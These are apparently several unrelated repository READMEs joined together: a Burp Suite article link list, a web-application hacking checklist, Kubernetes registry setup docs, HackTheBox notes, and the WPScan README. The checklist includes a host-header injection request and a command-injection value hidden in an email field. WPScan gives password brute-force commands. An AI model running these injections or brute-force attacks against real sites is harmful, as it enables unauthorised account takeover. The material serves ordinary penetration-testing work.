Suite security automation with Selenium and Jenkins](https://securify.nl/en/blog/SFY20160901/burp-suite-security-automation-with-selenium-and-jenkins.html) - 2016.09 [securityblog] [Simple python script to make multiple raw requests from Burp](http://securityblog.gr/3634/simple-python-script-to-make-multiple-raw-requests-from-burp/) - 2016.07 [portswigger] [Introducing Burp Infiltrator | Blog](https://portswigger.net/blog/introducing-burp-infiltrator) - 2016.06 [insinuator] [SAMLReQuest Burpsuite Extention](https://insinuator.net/2016/06/samlrequest-burpsuite-extention/) - 2016.05 [jerrygamblin] [BurpBrowser](https://jerrygamblin.com/2016/05/31/burpbrowser/) - 2016.05 [silentsignal] [Detecting ImageTragick with Burp Suite Pro](https://blog.silentsignal.eu/2016/05/13/detecting-imagetragick-with-burp-suite-pro/) - 2016.04 [portswigger] [Introducing Burp Projects | Blog](https://portswigger.net/blog/introducing-burp-projects) - 2016.04 [breakpoint] [Web Hacking with Burp Suite 101](https://breakpoint-labs.com/blog/web-hacking-with-burp-suite-101/) - 2016.04 [hack] [Advanced Burp Suite](https://hack-ed.net/2016/04/02/advanced-burp-suite/) - 2016.03 [freebuf] [Burp Suite新手指南](http://www.freebuf.com/articles/web/100377.html) - 2016.03 [portswigger] [Using Burp Suite to audit and exploit an eCommerce application | Blog](https://portswigger.net/blog/using-burp-suite-to-audit-and-exploit-an-ecommerce-application) - 2016.03 [freebuf] [渗透测试神器Burpsuite Pro v1.6.38(含下载)](http://www.freebuf.com/sectool/99127.html) - 2016.03 [360] [使用burp进行java反序列化攻击](https://www.anquanke.com/post/id/83571/) - 2016.03 [netspi] [Java Deserialization Attacks with Burp](https://blog.netspi.com/java-deserialization-attacks-burp/) - 2016.02 [] [对burpsuite_pro逆向的一点心得](http://www.91ri.org/15264.html) - 2016.02 [THER] [Learn Burp Suite, the Nr. 1 Web Hacking Tool - 00 - Intro](https://www.youtube.com/watch?v=AVzC7ETqpDo) - 2016.02 [THER] [Learn Burp Suite, the Nr. 1 Web Hacking Tool - 08 - Congrats](https://www.youtube.com/watch?v=8Mh5sMb_D2Q) - 2016.02 [THER] [Learn Burp Suite, the Nr. 1 Web Hacking Tool - 02 - General Concept](https://www.youtube.com/watch?v=udl4oqr_ylM) - 2016.02 [THER] [Learn Burp Suite, the Nr. 1 Web Hacking Tool - 01 - Environment Setup](https://www.youtube.com/watch?v=yqnUOdr0eVk) - 2016.02 [gracefulsecurity] [Introduction to Burp Suite Pro](https://www.gracefulsecurity.com/introduction-to-burp-suite-pro/) - 2016.02 [bishopfox] [Burp, Collaborate, and Listen: A Pentester Reviews the Latest Burp Suite Addition](https://www.bishopfox.com/blog/2016/02/burp-collaborate-listen-pentester-reviews-latest-burp-suite-addition/) - 2016.02 [xxlegend] [如何让Burpsuite监听微信公众号](http://xxlegend.com/2016/02/01/如何让Burpsuite监听微信公众号/) - 2016.01 [hack] [Burp Suite For Beginners](https://hack-ed.net/2016/01/09/burp-suite-for-beginners/) - 2016.01 [blackhillsinfosec] [Pentesting ASP.NET Cookieless Sessions with Burp](https://www.blackhillsinfosec.com/pentesting-asp-net-cookieless-sessions-with-burp/) - 2015.12 [portswigger] [Burp Clickbandit: A JavaScript based clickjacking PoC generator | Blog](https://portswigger.net/blog/burp-clickbandit-a-javascript-based-clickjacking-poc-generator) - 2015.11 [gracefulsecurity] [Burp Suite Extensions: Installing Jython and adding an Extension](https://www.gracefulsecurity.com/burp-suite-extensions-installing-jython-and-adding-an-extension/) - 2015.09 [freebuf] [渗透测试神器Burpsuite Pro v1.6.24(含下载)](http://www.freebuf.com/sectool/77272.html) - 2015.09 [freebuf] [BurpSuite下一代渗透检测工具:BurpKit](http://www.freebuf.com/sectool/77436.html) - 2015.08 [portcullis] [Burp Extension](https://labs.portcullis.co.uk/blog/burp-extension/) - 2015.07 [secist] [使用burp进行java反序列化攻击](http://www.secist.com/archives/309.html) - 2015.07 [compass] [SAML Burp Extension](https://blog.compass-security.com/2015/07/saml-burp-extension/) - 2015.07 [nvisium] [Intro to BurpSuite, Part VI: Burpsuite Sequencer](https://nvisium.com/blog/2015/07/09/intro-to-burpsuite-part-vi-burpsuite/) - 2015.07 [] [小技巧:Burp Suite 插件库 BApp Store](http://www.91ri.org/13377.html) - 2015.06 [gracefulsecurity] [Burp Suite Keyboard Shortcuts!](https://www.gracefulsecurity.com/burp-suite-keyboard-shortcuts/) - 2015.06 [acunetix] [Pre-seeding a crawl using output from Fiddler, Burp, Selenium and HAR files](https://www.acunetix.com/blog/articles/pre-seeding-a-crawl-using-output-from-fiddler-burp-selenium-and-har-files/) - 2015.05 [idontplaydarts] [Detecting low entropy tokens with massive bloom filters in Burp](https://www.idontplaydarts.com/2015/05/low-entropy-tokens-massive-bloom-filters-burp-http/) - 2015.04 [mediaservice] [Pentesting with Serialized Java Objects and Burp Suite](https://techblog.mediaservice.net/2015/04/pentesting-with-serialized-java-objects-and-burp-suite/) - 2014.12 [insinuator] [Getting 20k Inline-QR-Codes out of Burp](https://insinuator.net/2014/12/getting-20k-inline-qr-codes-out-of-burp/) - 2014.11 [liftsecurity] [Static Analysis and Burp Suite](https://blog.liftsecurity.io/2014/11/18/static-analysis-and-burp-suite/) - 2014.10 [buer] [Detecting Burp Suite – Part 2 of 3: Callback Exposure](https://buer.haus/2014/10/13/detecting-burp-suite-part-2-of-3-callback-exposure/) - 2014.09 [compass] [BurpSentinel on Darknet](https://blog.compass-security.com/2014/09/burpsentinel-on-darknet/) - 2014.08 [nvisium] [Intro to BurpSuite V: Extracting Intrusions](https://nvisium.com/blog/2014/08/13/intro-to-burpsuite-v-extracting/) - 2014.08 [milo2012] [Extended functionality for Burp Plugin – Carbonator](https://milo2012.wordpress.com/2014/08/04/extended-functionality-for-burp-plugin-carbonator/) - 2014.07 [portswigger] [Burp gets new JavaScript analysis capabilities | Blog](https://portswigger.net/blog/burp-gets-new-javascript-analysis-capabilities) - 2014.07 [nvisium] [Intro to BurpSuite Part IV: Being Intrusive](https://nvisium.com/blog/2014/07/23/intro-to-burpsuite-part-iv-being/) - 2014.07 [liftsecurity] [Introducing Burpbuddy](https://blog.liftsecurity.io/2014/07/15/introducing-burpbuddy/) - 2014.07 [buer] [Detecting Burp Suite – Part 1 of 3: Info Leak](https://buer.haus/2014/07/13/detecting-burp-suite-part-1-of-3-info-leak/) - 2014.06 [parsiya] [Piping SSL/TLS Traffic from SoapUI to Burp](https://parsiya.net/blog/2014-06-25-piping-ssl/tls-traffic-from-soapui-to-burp/) - 2014.05 [sans] [Assessing SOAP APIs with Burp](https://isc.sans.edu/forums/diary/Assessing+SOAP+APIs+with+Burp/18175/) - 2014.05 [nvisium] [Intro to BurpSuite: Part III - It's all about Repetition!](https://nvisium.com/blog/2014/05/09/intro-to-burpsuite-part-iii-its-all/) - 2014.04 [freebuf] [国产BurpSuite 插件 Assassin V1.0发布](http://www.freebuf.com/sectool/32153.html) - 2014.03 [nvisium] [Burp App Store](https://nvisium.com/blog/2014/03/14/burp-app-store/) - 2014.02 [nvisium] [Intro to Burp Part II: Sighting in your Burp Scope](https://nvisium.com/blog/2014/02/21/intro-to-burp-part-ii-sighting-in-your/) - 2014.01 [sethsec] [Re-launch - A focus on Web Application Pen Testing, Burp Extensions, etc](https://sethsec.blogspot.com/2014/01/re-launch-focus-on-web-application-pen.html) - 2013.12 [appsecconsulting] [So You Want to Build a Burp Plugin?](https://appsecconsulting.com/blog/so-you-want-to-build-a-burp-plugin) - 2013.06 [sec] [How to rapidly build a Burp session handling extension using JavaScript](https://sec-consult.com/en/blog/2013/06/how-to-rapidly-build-a-burp-session-handling-extension-using-javascript/) - 2013.06 [freebuf] [BurpSuite系列使用视频教程(下载)](http://www.freebuf.com/video/10468.html) - 2013.05 [] [Burp通过注射点dump数据库](http://www.91ri.org/5872.html) - 2013.05 [trustwave] [Introducing the Burp Notes Extension](https://www.trustwave.com/Resources/SpiderLabs-Blog/Introducing-the-Burp-Notes-Extension/) - 2013.03 [security] [Penetration Test pWnOS v2.0 with BurpSuite](http://security-is-just-an-illusion.blogspot.com/2013/03/penetration-test-pwnos-v20-with.html) - 2013.03 [freebuf] [使用Burp攻击Web Services](http://www.freebuf.com/articles/web/7592.html) - 2013.03 [netspi] [Hacking Web Services with Burp](https://blog.netspi.com/hacking-web-services-with-burp/) - 2013.01 [websecurify] [Reading Burp Files From Websecurify Suite](https://blog.websecurify.com/2013/01/reading-burp-files-from-websecurify-suite.html) - 2013.01 [netspi] [Tool release: AMF Deserialize Burp plugin](https://blog.netspi.com/tool-release-amf-deserialize-burp-plugin/) - 2012.12 [pentestlab] [Local File Inclusion Exploitation With Burp](https://pentestlab.blog/2012/12/26/local-file-inclusion-exploitation-with-burp/) - 2012.12 [portswigger] [Sample Burp Suite extension: custom editor tab | Blog](https://portswigger.net/blog/sample-burp-suite-extension-custom-editor-tab) - 2012.12 [portswigger] [Writing your first Burp Suite extension | Blog](https://portswigger.net/blog/writing-your-first-burp-suite-extension) - 2012.12 [portswigger] [New Burp Suite Extensibility | Blog](https://portswigger.net/blog/new-burp-suite-extensibility) - 2012.11 [perezbox] [Spoofing an Admin’s Cookies Using Burp](https://perezbox.com/2012/11/pracapp-spoofing-an-admins-cookies-using-burp-suite/) - 2012.11 [freebuf] [Burp Suite免费版本(Free Edition)v1.5发布](http://www.freebuf.com/sectool/6090.html) - 2012.10 [] [利用burpsuite获得免费空间](http://www.91ri.org/4522.html) - 2012.10 [netspi] [Pentesting Java Thick Applications with Burp JDSer](https://blog.netspi.com/pentesting-java-thick-applications-with-burp-jdser/) - 2012.09 [] [用Burp_suite快速处理上传截断](http://www.91ri.org/4091.html) - 2012.09 [] [使用burp suite探测Web目录](http://www.91ri.org/4064.html) - 2012.05 [freebuf] [Burpsuite系列视频教程不加密版第一部分公布下载](http://www.freebuf.com/articles/1467.html) - 2011.12 [milo2012] [OWASP Ajax Crawling Tool (Good Companion Tool to Burpsuite)](https://milo2012.wordpress.com/2011/12/26/owasp-ajax-crawling-tool-good-companion-tool-to-burpsuite/) - 2011.12 [insinuator] [Use Python for Burp plugins with pyBurp](https://insinuator.net/2011/12/use-python-for-burp-plugins-with-pyburp/) - 2011.10 [portswigger] [Breaking encrypted data using Burp | Blog](https://portswigger.net/blog/breaking-encrypted-data-using-burp) - 2011.06 [cyberis] ['Invisible Intercept' Function of Burp](https://www.cyberis.co.uk/2011/06/intercept-function-of-burp.html) # 贡献 内容为系统自动导出, 有任何问题请提issue
# Web Application Hacking List A list of web application checks sorted by functionality - [Web Applications](#web-applications) - [Categories](#categories) - [Signup/Register Form](#signupregister-form) - [Login Forms](#login-forms) - [Forgotten Password Form](#forgotten-password-form) - [Contact Forms](#contact-forms) - [Emails Forms](#emails-forms) - [Nuances](#nuances) - [PHP](#php) - [ASP.NET](#aspnet) - [JSP](#jsp) # Web Applications ## Categories ### Signup/Register Form - Username reusability ### Login Forms - Authentication Bypass - Database Injection - NoSQL - MySQL - Postgresql - etc - Maybe Forced Browsing (? TODO) - Discovering content that isn't properly protected by the authentication mechanism ### Forgotten Password Form - Insecure Direct Object References in the password reset link **Example** ``` http://example.com/password_reset/id/1234 ``` - Expiration of the password reset link - Host header injection for malicious host **Example** ``` POST http://www.example.com/password_reset/id/1234 HTTP/1.1 Host: yoursite.com ``` *Reference: https://hackerone.com/reports/281575* *Reference: https://lightningsecurity.io/blog/host-header-injection/* - Parameter Pollution to reset multiple accounts - If you don't own the account you are trying to reset the password for, it may be possible to achieve this by performing a parameter pollution attack. *Reference: https://hackerone.com/reports/322985* - Check if the email address is tied to the request **Example** ``` ``` *Reference: https://hackerone.com/reports/315879* - Check for cross-account usage of password reset token **Example** 1. Reset the password for an account you control 2. Reset the password for a second account you control 3. Attempt to swap the token from one account reset link to another 4. If it works then you may be able to takeover the account *Reference: [BugBounty How I was Able to Compromise Any User Account via Password Reset Functionality](https://medium.com/bugbountywriteup/bugbounty-how-i-was-able-to-compromise-any-user-account-via-reset-password-functionality-a11bb5f863b3 "BugBounty How I was Able to Compromise Any User Account via Password Reset Functionality")* ### Contact Forms - Header Injection - Host Header - CRLF Injection (CC; BCC) - Blind Cross-Site Scripting (XSS) - XSS Hunter - Burp Collaborator - Apache Logs - etc - Cross-Site Scripting (XSS) - In message preview - "Thank you for your email, {YOUR_NAME}" - Template Injections - This may be a lot easier to prove if the form has a "Send copy to my email" feature. - File Uploads - Remote Code Execution - Path Traversal - Stored XSS - Command Injection - eXternal XML Entities (XXE) - Command Injection - "[email protected]; ping ip" ### Emails Forms - Check for Template Injections ## Nuances ### PHP - Make sure that all validity checks are strict (`===` vs `==`) ### ASP.NET ### JSP
# Private Docker Registry in Kubernetes Kubernetes offers an optional private Docker registry addon, which you can turn on when you bring up a cluster or install later. This gives you a place to store truly private Docker images for your cluster. ## How it works The private registry runs as a `Pod` in your cluster. It does not currently support SSL or authentication, which triggers Docker's "insecure registry" logic. To work around this, we run a proxy on each node in the cluster, exposing a port onto the node (via a hostPort), which Docker accepts as "secure", since it is accessed by `localhost`. ## Turning it on Some cluster installs (e.g. GCE) support this as a cluster-birth flag. The `ENABLE_CLUSTER_REGISTRY` variable in `cluster/gce/config-default.sh` governs whether the registry is run or not. To set this flag, you can specify `KUBE_ENABLE_CLUSTER_REGISTRY=true` when running `kube-up.sh`. If your cluster does not include this flag, the following steps should work. Note that some of this is cloud-provider specific, so you may have to customize it a bit. ### Make some storage The primary job of the registry is to store data. To do that we have to decide where to store it. For cloud environments that have networked storage, we can use Kubernetes's `PersistentVolume` abstraction. The following template is expanded by `salt` in the GCE cluster turnup, but can easily be adapted to other situations: <!-- BEGIN MUNGE: EXAMPLE registry-pv.yaml.in --> ```yaml kind: PersistentVolume apiVersion: v1 metadata: name: kube-system-kube-registry-pv labels: kubernetes.io/cluster-service: "true" spec: {% if pillar.get('cluster_registry_disk_type', '') == 'gce' %} capacity: storage: {{ pillar['cluster_registry_disk_size'] }} accessModes: - ReadWriteOnce gcePersistentDisk: pdName: "{{ pillar['cluster_registry_disk_name'] }}" fsType: "ext4" {% endif %} ``` <!-- END MUNGE: EXAMPLE registry-pv.yaml.in --> If, for example, you wanted to use NFS you would just need to change the `gcePersistentDisk` block to `nfs`. See [here](../../../docs/user-guide/volumes.md) for more details on volumes. Note that in any case, the storage (in the case the GCE PersistentDisk) must be created independently - this is not something Kubernetes manages for you (yet). ### I don't want or don't have persistent storage If you are running in a place that doesn't have networked storage, or if you just want to kick the tires on this without committing to it, you can easily adapt the `ReplicationController` specification below to use a simple `emptyDir` volume instead of a `persistentVolumeClaim`. ## Claim the storage Now that the Kubernetes cluster knows that some storage exists, you can put a claim on that storage. As with the `PersistentVolume` above, you can start with the `salt` template: <!-- BEGIN MUNGE: EXAMPLE registry-pvc.yaml.in --> ```yaml kind: PersistentVolumeClaim apiVersion: v1 metadata: name: kube-registry-pvc namespace: kube-system labels: kubernetes.io/cluster-service: "true" spec: accessModes: - ReadWriteOnce resources: requests: storage: {{ pillar['cluster_registry_disk_size'] }} ``` <!-- END MUNGE: EXAMPLE registry-pvc.yaml.in --> This tells Kubernetes that you want to use storage, and the `PersistentVolume` you created before will be bound to this claim (unless you have other `PersistentVolumes` in which case those might get bound instead). This claim gives you the right to use this storage until you release the claim. ## Run the registry Now we can run a Docker registry: <!-- BEGIN MUNGE: EXAMPLE registry-rc.yaml --> ```yaml apiVersion: v1 kind: ReplicationController metadata: name: kube-registry-v0 namespace: kube-system labels: k8s-app: kube-registry version: v0 kubernetes.io/cluster-service: "true" spec: replicas: 1 selector: k8s-app: kube-registry version: v0 template: metadata: labels: k8s-app: kube-registry version: v0 kubernetes.io/cluster-service: "true" spec: containers: - name: registry image: registry:2 resources: limits: cpu: 100m memory: 100Mi env: - name: REGISTRY_HTTP_ADDR value: :5000 - name: REGISTRY_STORAGE_FILESYSTEM_ROOTDIRECTORY value: /var/lib/registry volumeMounts: - name: image-store mountPath: /var/lib/registry ports: - containerPort: 5000 name: registry protocol: TCP volumes: - name: image-store persistentVolumeClaim: claimName: kube-registry-pvc ``` <!-- END MUNGE: EXAMPLE registry-rc.yaml --> ## Expose the registry in the cluster Now that we have a registry `Pod` running, we can expose it as a Service: <!-- BEGIN MUNGE: EXAMPLE registry-svc.yaml --> ```yaml apiVersion: v1 kind: Service metadata: name: kube-registry namespace: kube-system labels: k8s-app: kube-registry kubernetes.io/cluster-service: "true" kubernetes.io/name: "KubeRegistry" spec: selector: k8s-app: kube-registry ports: - name: registry port: 5000 protocol: TCP ``` <!-- END MUNGE: EXAMPLE registry-svc.yaml --> ## Expose the registry on each node Now that we have a running `Service`, we need to expose it onto each Kubernetes `Node` so that Docker will see it as `localhost`. We can load a `Pod` on every node by dropping a YAML file into the kubelet config directory (/etc/kubernetes/manifests by default). <!-- BEGIN MUNGE: EXAMPLE ../../saltbase/salt/kube-registry-proxy/kube-registry-proxy.yaml --> ```yaml apiVersion: v1 kind: Pod metadata: name: kube-registry-proxy namespace: kube-system spec: containers: - name: kube-registry-proxy image: gcr.io/google_containers/kube-registry-proxy:0.4 resources: limits: cpu: 100m memory: 50Mi env: - name: REGISTRY_HOST value: kube-registry.kube-system.svc.cluster.local - name: REGISTRY_PORT value: "5000" ports: - name: registry containerPort: 80 hostPort: 5000 ``` <!-- END MUNGE: EXAMPLE ../../saltbase/salt/kube-registry-proxy/kube-registry-proxy.yaml --> This ensures that port 5000 on each node is directed to the registry `Service`. You should be able to verify that it is running by hitting port 5000 with a web browser and getting a 404 error: ```console $ curl localhost:5000 404 page not found ``` ## Using the registry To use an image hosted by this registry, simply say this in your `Pod`'s `spec.containers[].image` field: ```yaml image: localhost:5000/user/container ``` Before you can use the registry, you have to be able to get images into it, though. If you are building an image on your Kubernetes `Node`, you can spell out `localhost:5000` when you build and push. More likely, though, you are building locally and want to push to your cluster. You can use `kubectl` to set up a port-forward from your local node to a running Pod: ```console $ POD=$(kubectl get pods --namespace kube-system -l k8s-app=kube-registry \ -o template --template '{{range .items}}{{.metadata.name}} {{.status.phase}}{{"\n"}}{{end}}' \ | grep Running | head -1 | cut -f1 -d' ') $ kubectl port-forward --namespace kube-system $POD 5000:5000 & ``` Now you can build and push images on your local computer as `localhost:5000/yourname/container` and those images will be available inside your kubernetes cluster with the same name. # More Extensions - [Use GCS as storage backend](gcs/README.md) - [Enable TLS/SSL](tls/README.md) - [Enable Authentication](auth/README.md) ## Future improvements * Allow port-forwarding to a Service rather than a pod (#15180) [![Analytics](https://kubernetes-site.appspot.com/UA-36037335-10/GitHub/cluster/addons/registry/README.md?pixel)]()
# hackthebox [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT) ![GitHub repo size](https://img.shields.io/github/repo-size/cyberwr3nch/hackthebox) <br /> ![GitHub Repo stars](https://img.shields.io/github/stars/cyberwr3nch/hackthebox?style=social) ![GitHub forks](https://img.shields.io/github/forks/cyberwr3nch/hackthebox?style=social) ![GitHub watchers](https://img.shields.io/github/watchers/cyberwr3nch/hackthebox?style=social) Notes Taken for HTB Machine<br /> Will be periodiclly updated, created with the intend of unwraping all possible ways and to prep for exams<br /> Yet More to be updated<br /> created & maintained by: **cyberwr3nch** # Contents - [Command Reference](https://github.com/cyberwr3nch/hackthebox/tree/master/notes) - [Tools](https://github.com/cyberwr3nch/hackthebox/tree/master/tools) - [Writeups](https://github.com/cyberwr3nch/writeups/tree/main/htb) #### SAY NO TO MSF ! #### nvm this Constantly updating from *MAY 3<sup>rd</sup> 2020* # Thanks for visiting A noob _cyberwr3nch🔧_ A member of **TCSC** Learn and Spread <3 ``` xoxo💙``` ### Support My contents <a href="https://www.buymeacoffee.com/cyberwr3nch" target="_blank"><img align="left" alt="Dhanesh Sivasamy's Twitter" width="120px" src="https://cdn.buymeacoffee.com/buttons/v2/default-blue.png"></a>
![alt text](https://raw.githubusercontent.com/wpscanteam/wpscan/gh-pages/wpscan_logo_407x80.png "WPScan - WordPress Security Scanner") [![Build Status](https://travis-ci.org/wpscanteam/wpscan.svg?branch=master)](https://travis-ci.org/wpscanteam/wpscan) [![Code Climate](https://img.shields.io/codeclimate/github/wpscanteam/wpscan.svg)](https://codeclimate.com/github/wpscanteam/wpscan) [![Docker Pulls](https://img.shields.io/docker/pulls/wpscanteam/wpscan.svg)](https://hub.docker.com/r/wpscanteam/wpscan/) # LICENSE ## WPScan Public Source License The WPScan software (henceforth referred to simply as "WPScan") is dual-licensed - Copyright 2011-2018 WPScan Team. Cases that include commercialization of WPScan require a commercial, non-free license. Otherwise, WPScan can be used without charge under the terms set out below. ### 1. Definitions 1.1 "License" means this document. 1.2 "Contributor" means each individual or legal entity that creates, contributes to the creation of, or owns WPScan. 1.3 "WPScan Team" means WPScan’s core developers, an updated list of whom can be found within the CREDITS file. ### 2. Commercialization A commercial use is one intended for commercial advantage or monetary compensation. Example cases of commercialization are: - Using WPScan to provide commercial managed/Software-as-a-Service services. - Distributing WPScan as a commercial product or as part of one. - Using WPScan as a value added service/product. Example cases which do not require a commercial license, and thus fall under the terms set out below, include (but are not limited to): - Penetration testers (or penetration testing organizations) using WPScan as part of their assessment toolkit. - Penetration Testing Linux Distributions including but not limited to Kali Linux, SamuraiWTF, BackBox Linux. - Using WPScan to test your own systems. - Any non-commercial use of WPScan. If you need to purchase a commercial license or are unsure whether you need to purchase a commercial license contact us - [email protected]. We may grant commercial licenses at no monetary cost at our own discretion if the commercial usage is deemed by the WPScan Team to significantly benefit WPScan. Free-use Terms and Conditions; ### 3. Redistribution Redistribution is permitted under the following conditions: - Unmodified License is provided with WPScan. - Unmodified Copyright notices are provided with WPScan. - Does not conflict with the commercialization clause. ### 4. Copying Copying is permitted so long as it does not conflict with the Redistribution clause. ### 5. Modification Modification is permitted so long as it does not conflict with the Redistribution clause. ### 6. Contributions Any Contributions assume the Contributor grants the WPScan Team the unlimited, non-exclusive right to reuse, modify and relicense the Contributor's content. ### 7. Support WPScan is provided under an AS-IS basis and without any support, updates or maintenance. Support, updates and maintenance may be given according to the sole discretion of the WPScan Team. ### 8. Disclaimer of Warranty WPScan is provided under this License on an “as is” basis, without warranty of any kind, either expressed, implied, or statutory, including, without limitation, warranties that the WPScan is free of defects, merchantable, fit for a particular purpose or non-infringing. ### 9. Limitation of Liability To the extent permitted under Law, WPScan is provided under an AS-IS basis. The WPScan Team shall never, and without any limit, be liable for any damage, cost, expense or any other payment incurred as a result of WPScan's actions, failure, bugs and/or any other interaction between WPScan and end-equipment, computers, other software or any 3rd party, end-equipment, computer or services. ### 10. Disclaimer Running WPScan against websites without prior mutual consent may be illegal in your country. The WPScan Team accept no liability and are not responsible for any misuse or damage caused by WPScan. ### 11. Trademark The "wpscan" term is a registered trademark. This License does not grant the use of the "wpscan" trademark or the use of the WPScan logo. # INSTALL WPScan comes pre-installed on the following Linux distributions: - [BackBox Linux](http://www.backbox.org/) - [Kali Linux](http://www.kali.org/) - [Pentoo](http://www.pentoo.ch/) - [SamuraiWTF](http://samurai.inguardians.com/) - [BlackArch](http://blackarch.org/) On macOS WPScan is packaged by [Homebrew](https://brew.sh/) as [`wpscan`](http://braumeister.org/formula/wpscan). Windows is not supported We suggest you use our official Docker image from https://hub.docker.com/r/wpscanteam/wpscan/ to avoid installation problems. # DOCKER ## Install Docker [https://docs.docker.com/engine/installation/](https://docs.docker.com/engine/installation/) ## Get the image Pull the repo with `docker pull wpscanteam/wpscan` ## Start WPScan ``` docker run -it --rm wpscanteam/wpscan -u https://yourblog.com [options] ``` For the available Options, please see https://github.com/wpscanteam/wpscan#wpscan-arguments If you run the git version of wpscan we included some binstubs in ./bin for easier start of wpscan. ## Examples Mount a local wordlist to the docker container and start a bruteforce attack for user admin ``` docker run -it --rm -v ~/wordlists:/wordlists wpscanteam/wpscan --url https://yourblog.com --wordlist /wordlists/crackstation.txt --username admin ``` (This mounts the host directory `~/wordlists` to the container in the path `/wordlists`) Use logfile option ``` # the file must exist prior to starting the container, otherwise docker will create a directory with the filename touch ~/FILENAME docker run -it --rm -v ~/FILENAME:/wpscan/output.txt wpscanteam/wpscan --url https://yourblog.com --log /wpscan/output.txt ``` Published on https://hub.docker.com/r/wpscanteam/wpscan/ # Manual install ## Prerequisites - Ruby >= 2.1.9 - Recommended: 2.5.1 - Curl >= 7.21 - Recommended: latest - FYI the 7.29 has a segfault - RubyGems - Recommended: latest - Git ### Installing dependencies on Ubuntu sudo apt-get install libcurl4-openssl-dev libxml2 libxml2-dev libxslt1-dev ruby-dev build-essential libgmp-dev zlib1g-dev ### Installing dependencies on Debian sudo apt-get install gcc git ruby ruby-dev libcurl4-openssl-dev make zlib1g-dev ### Installing dependencies on Fedora sudo dnf install gcc ruby-devel libxml2 libxml2-devel libxslt libxslt-devel libcurl-devel patch rpm-build ### Installing dependencies on Arch Linux pacman -Syu ruby pacman -Syu libyaml ### Installing dependencies on macOS Apple Xcode, Command Line Tools and the libffi are needed (to be able to install the FFI gem), See [http://stackoverflow.com/questions/17775115/cant-setup-ruby-environment-installing-fii-gem-error](http://stackoverflow.com/questions/17775115/cant-setup-ruby-environment-installing-fii-gem-error) ## Installing with RVM (recommended when doing a manual install) If you are using GNOME Terminal, there are some steps required before executing the commands. See here for more information: https://rvm.io/integration/gnome-terminal#integrating-rvm-with-gnome-terminal # Install all prerequisites for your OS (look above) cd ~ curl -sSL https://rvm.io/mpapis.asc | gpg --import - curl -sSL https://get.rvm.io | bash -s stable source ~/.rvm/scripts/rvm echo "source ~/.rvm/scripts/rvm" >> ~/.bashrc rvm install 2.5.1 rvm use 2.5.1 --default echo "gem: --no-ri --no-rdoc" > ~/.gemrc git clone https://github.com/wpscanteam/wpscan.git cd wpscan gem install bundler bundle install --without test ## Installing manually (not recommended) git clone https://github.com/wpscanteam/wpscan.git cd wpscan sudo gem install bundler && bundle install --without test # KNOWN ISSUES - no such file to load -- rubygems ```update-alternatives --config ruby``` And select your ruby version See [https://github.com/wpscanteam/wpscan/issues/148](https://github.com/wpscanteam/wpscan/issues/148) # WPSCAN ARGUMENTS --update Update the database to the latest version. --url | -u <target url> The WordPress URL/domain to scan. --force | -f Forces WPScan to not check if the remote site is running WordPress. --enumerate | -e [option(s)] Enumeration. option : u usernames from id 1 to 10 u[10-20] usernames from id 10 to 20 (you must write [] chars) p plugins vp only vulnerable plugins ap all plugins (can take a long time) tt timthumbs t themes vt only vulnerable themes at all themes (can take a long time) Multiple values are allowed : "-e tt,p" will enumerate timthumbs and plugins If no option is supplied, the default is "vt,tt,u,vp" --exclude-content-based "<regexp or string>" Used with the enumeration option, will exclude all occurrences based on the regexp or string supplied. You do not need to provide the regexp delimiters, but you must write the quotes (simple or double). --config-file | -c <config file> Use the specified config file, see the example.conf.json. --user-agent | -a <User-Agent> Use the specified User-Agent. --cookie <string> String to read cookies from. --random-agent | -r Use a random User-Agent. --follow-redirection If the target url has a redirection, it will be followed without asking if you wanted to do so or not --batch Never ask for user input, use the default behaviour. --no-color Do not use colors in the output. --log [filename] Creates a log.txt file with WPScan's output if no filename is supplied. Otherwise the filename is used for logging. --no-banner Prevents the WPScan banner from being displayed. --disable-accept-header Prevents WPScan sending the Accept HTTP header. --disable-referer Prevents setting the Referer header. --disable-tls-checks Disables SSL/TLS certificate verification. --wp-content-dir <wp content dir> WPScan try to find the content directory (ie wp-content) by scanning the index page, however you can specify it. Subdirectories are allowed. --wp-plugins-dir <wp plugins dir> Same thing than --wp-content-dir but for the plugins directory. If not supplied, WPScan will use wp-content-dir/plugins. Subdirectories are allowed --proxy <[protocol://]host:port> Supply a proxy. HTTP, SOCKS4 SOCKS4A and SOCKS5 are supported. If no protocol is given (format host:port), HTTP will be used. --proxy-auth <username:password> Supply the proxy login credentials. --basic-auth <username:password> Set the HTTP Basic authentication. --wordlist | -w <wordlist> Supply a wordlist for the password brute forcer. If the "-" option is supplied, the wordlist is expected via STDIN. --username | -U <username> Only brute force the supplied username. --usernames <path-to-file> Only brute force the usernames from the file. --cache-dir <cache-directory> Set the cache directory. --cache-ttl <cache-ttl> Typhoeus cache TTL. --request-timeout <request-timeout> Request Timeout. --connect-timeout <connect-timeout> Connect Timeout. --threads | -t <number of threads> The number of threads to use when multi-threading requests. --throttle <milliseconds> Milliseconds to wait before doing another web request. If used, the --threads should be set to 1. --help | -h This help screen. --verbose | -v Verbose output. --version Output the current version and exit. # WPSCAN EXAMPLES Do 'non-intrusive' checks... ```ruby wpscan.rb --url www.example.com``` Do wordlist password brute force on enumerated users using 50 threads... ```ruby wpscan.rb --url www.example.com --wordlist darkc0de.lst --threads 50``` Do wordlist password brute force on enumerated users using STDIN as the wordlist... ```crunch 5 13 -f charset.lst mixalpha | ruby wpscan.rb --url www.example.com --wordlist -``` Do wordlist password brute force on the 'admin' username only... ```ruby wpscan.rb --url www.example.com --wordlist darkc0de.lst --username admin``` Enumerate installed plugins... ```ruby wpscan.rb --url www.example.com --enumerate p``` Run all enumeration tools... ```ruby wpscan.rb --url www.example.com --enumerate``` Use custom content directory... ```ruby wpscan.rb -u www.example.com --wp-content-dir custom-content``` Update WPScan's databases... ```ruby wpscan.rb --update``` Debug output... ```ruby wpscan.rb --url www.example.com --debug-output 2>debug.log``` # PROJECT HOME [http://www.wpscan.org](http://www.wpscan.org) # VULNERABILITY DATABASE [https://wpvulndb.com](https://wpvulndb.com) # GIT REPOSITORY [https://github.com/wpscanteam/wpscan](https://github.com/wpscanteam/wpscan) # ISSUES [https://github.com/wpscanteam/wpscan/issues](https://github.com/wpscanteam/wpscan/issues) # DEVELOPER DOCUMENTATION [http://rdoc.info/github/wpscanteam/wpscan/frames](http://rdoc.info/github/wpscanteam/wpscan/frames)
